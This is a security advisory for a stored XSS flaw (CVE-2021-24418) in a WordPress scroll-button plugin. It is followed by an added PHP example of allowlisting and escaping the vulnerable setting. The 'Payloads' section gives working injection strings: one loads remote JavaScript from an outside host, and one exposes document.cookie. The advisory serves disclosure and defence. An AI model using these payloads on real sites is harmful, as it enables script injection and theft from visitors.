/*!
- # VULNERABILITY: Smooth Scroll Page Up/Down Buttons WordPress Plugin <= 1.4 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/smooth-page-scroll-updown-buttons/
- # DATE: 2021-04-29
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Mark Senff [ http://www.senff.com ]
- # SOFTWARE VERSION: <= 1.4
- # SOFTWARE LINK: https://wordpress.org/plugins/smooth-page-scroll-updown-buttons/
- # CVSS: AV:N/AC:L/PR:H/UI:R/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24418
*/

### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the Smooth Scroll Page Up/Down Buttons plugin through v1.4 for WordPress.

[i] Vulnerable parameter(s): $page_scroll_buttons_options['psb_positioning'] (smooth-page-scroll-updown-buttons/smooth-page-scroll-updown-buttons.php:212-215).

### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]

[$] m0ze" style=position:fixed!important;z-index:99999;display:flex;align-items:center;justify-content:center;width:100%;height:100%;font-size:214px;background:black;color:lime;top:0;bottom:0;left:0;right:0;overflow:visible!important; onmousemove=;import(`https://m0ze.ru/payload/a.js`); m0ze=

[$] m0ze" style=position:fixed!important;z-index:99999;display:flex;align-items:center;justify-content:center;width:100%;height:100%;font-size:214px;background:black;color:lime;top:0;bottom:0;left:0;right:0;overflow:visible!important; onmousemove=;alert(document.cookie); ">
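
### -- [ Mitigation example (added): ]

[+] The PHP below is an added example, not the plugin's code or the vendor's patch. It assumes the stored psb_positioning value is echoed into a double-quoted HTML attribute (as the leading " in the payloads suggests); the function names, the allowed position values and the sample input are hypothetical.

```php
<?php
// Added example: allowlist the setting, then escape it for the attribute context.
// The allowed values are constructed placeholders, not the plugin's real options.
const PSB_ALLOWED_POSITIONS = ['psb-left', 'psb-right'];
const PSB_DEFAULT_POSITION  = 'psb-right';

// Validation: accept only a known position, otherwise fall back to the default.
// In WordPress this check belongs in the option's sanitize callback.
function psb_sanitize_positioning($raw): string
{
    if (!is_string($raw)) {
        return PSB_DEFAULT_POSITION;
    }
    return in_array($raw, PSB_ALLOWED_POSITIONS, true) ? $raw : PSB_DEFAULT_POSITION;
}

// Output escaping: encode quotes so the value cannot close the attribute.
// In WordPress, esc_attr() is the output escape for this context.
function psb_escape_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Unsafe pattern, for contrast: the stored value is concatenated as-is.
function psb_render_unescaped(array $options): string
{
    return '<div class="psb-buttons ' . $options['psb_positioning'] . '"></div>';
}

// Hardened pattern: validate first, escape at the point of output anyway.
function psb_render_hardened(array $options): string
{
    $position = psb_sanitize_positioning($options['psb_positioning'] ?? null);
    return '<div class="psb-buttons ' . psb_escape_attr($position) . '"></div>';
}

// Constructed, inert sample: a quote followed by an extra attribute.
$stored = ['psb_positioning' => 'x" data-injected=1 y="'];

// The quote ends the class attribute and data-injected becomes a real attribute.
echo psb_render_unescaped($stored), PHP_EOL;

// Escaping alone keeps the whole string inside the class attribute value.
echo '<div class="psb-buttons ', psb_escape_attr($stored['psb_positioning']), '"></div>', PHP_EOL;

// Allowlist plus escaping: the unknown value is replaced by the default.
echo psb_render_hardened($stored), PHP_EOL;
```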